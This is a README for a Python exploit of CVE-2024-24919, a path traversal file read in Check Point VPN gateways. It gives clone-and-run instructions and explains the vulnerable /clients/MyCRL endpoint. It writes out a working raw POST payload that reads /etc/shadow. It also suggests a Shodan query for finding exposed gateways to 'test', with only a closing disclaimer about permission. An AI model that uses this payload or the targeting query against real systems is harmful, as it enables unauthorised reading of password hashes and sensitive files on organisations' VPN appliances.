This repository contains a python exploit for the CVE-2024-24919, a vulnerability that allows you to read sensitive files from the vulnerable page.

This exploit first checks if the target is vulnerable, and then gets the path you specify.

Severity: Critical

First clone the repository:

git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit

Give privileges and execute the exploit with python3

chmod +x exploit.py
python3 exploit.py

Then follow the steps and you will get the data of the file you specify

If you are strugling make sure the URL you specify is the main one

✓ https://google.com

✘ https://google.com/search?client=firefox

First we need to make sure that the website have Check Point Security Gateways which have remote access VPN or mobile access software enabled.

In this exploit we are pointing to the {ip}/clients/MyCRL endpoint.

This endpoint is vulnerable if we do a POST petition, we add the string CSHELL/ and the path of the file we want to read using a Path Traversal.

The request will be something like this:

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

We get all of this looking the source code

For more information about the process check this post --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

If you want to test this vulnerability you can use Sodan to find some vulnerable websites, using this query in sodan

Server: “Check Point SVN Foundation”

https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919

This script is for educational purposes only. Use it responsibly and only on systems you have permission to access.